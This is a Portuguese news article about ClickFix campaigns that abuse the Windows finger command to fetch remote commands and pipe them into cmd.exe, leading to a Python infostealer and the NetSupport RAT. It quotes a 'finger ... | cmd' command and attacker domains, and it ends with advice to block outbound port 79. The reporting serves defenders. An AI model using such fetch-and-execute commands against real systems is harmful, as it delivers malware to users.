O comando "finger", que existe há várias décadas, voltou a ganhar destaque no cenário da cibersegurança.
Atacantes estão explorando esse protocolo para recuperar comandos remotamente e executá-los em dispositivos Windows.
Historicamente, o comando finger era utilizado em sistemas Unix e Linux para consultar informações de usuários locais e remotos por meio do Finger protocol.
Posteriormente, ele também foi implementado no Windows.
Embora ainda seja suportado, seu uso hoje é raro, especialmente se comparado a épocas anteriores.
Quando acionado, o comando retorna dados básicos do usuário, como nome de login, nome completo (se configurado no arquivo /etc/passwd), diretório home, telefones, último acesso e outras informações.
Recentemente, pesquisadores identificaram campanhas maliciosas que empregam o Finger protocol em ataques do tipo ClickFix.
Nessas ofensivas, comandos são baixados remotamente via finger e executados em dispositivos infectados.
Esse não é o primeiro caso de abuso do finger nesse formato.
Em 2020, especialistas já haviam alertado que ele vinha sendo usado como LOLBIN (Living Off The Land Binary) para baixar malware e evitar detecção.
No mês passado, a equipe MalwareHunterTeam revelou um arquivo batch que, ao ser executado, utilizava o comando "finger [email protected][.]com" para recuperar comandos de um servidor remote finger.
Esses comandos eram então executados localmente via cmd.exe.
Embora esse servidor já esteja inacessível, outras ameaças e ataques que exploram a mesma técnica continuam ativos.
Em um caso recente no Reddit, um usuário relatou ter caído em um ataque ClickFix que simulava um Captcha, induzindo-o a executar um comando no Windows para “verificar que era humano”.
O comando tentava recuperar e executar comandos via finger a partir do servidor finger.cloudmega[.]org.
Embora esse servidor também tenha parado de responder, outro usuário conseguiu capturar a saída do comando.
O ataque usa o protocolo Finger para entregar scripts remotamente, executando os comandos recebidos pelo cmd.exe.
Essa cadeia cria uma pasta com nome aleatório, copia o executável curl.exe para outro nome também aleatório, usa essa cópia para baixar um arquivo ZIP disfarçado de PDF do domínio cloudmega[.]org e, em seguida, extrai um pacote malicioso em Python.
O script Python baixado é executado via pythonw.exe e, em sua última ação, envia um callback ao servidor atacante confirmando a execução, enquanto apresenta ao usuário um prompt falso de “Verifique se você é humano”.
Ainda não está claro o propósito exato do pacote Python, mas um arquivo batch relacionado sugere que o objetivo seja o roubo de informações (infostealer).
O MalwareHunterTeam também identificou uma campanha similar que utiliza "finger [email protected] | cmd" para obter e executar comandos semelhantes aos do ataque ClickFix descrito.
Nesta variação, a técnica se mostrou mais sofisticada: os comandos verificam a presença de ferramentas típicas em análises de malware, como filemon, procexp, Wireshark, Fiddler, IDA, x64dbg, OllyDbg, entre outras.
Se alguma dessas ferramentas for detectada, a execução é interrompida.
Na ausência de ferramentas de análise, o ataque baixa um arquivo ZIP, também disfarçado de PDF, que contém o RAT NetSupport Manager.
O malware é configurado para ser executado via tarefa agendada sempre que o usuário fizer login.
Apesar de o uso malicioso do comando finger atualmente parecer obra de um único grupo, ataques do tipo ClickFix continuam ativos e podem enganar novos usuários.
Por isso, é fundamental ficar atento a essas campanhas.
Para os profissionais de defesa, a forma mais eficaz de bloquear o uso malicioso do finger é restringindo o tráfego de saída pela porta TCP 79, usada para conexões ao serviço Finger protocol.
Essa medida simples pode impedir que comandos remotos sejam recuperados por esse vetor.
Publicidade
Conheça a Solyd One, e tenha acesso a todos os cursos de segurança ofensiva da Solyd, todas as certificações práticas, incluindo a SYCP, 2 CTFs anuais com prêmios de até 30 mil reais, dezenas de laboratórios realísticos, suporte, comunidade e muito mais. Saiba mais...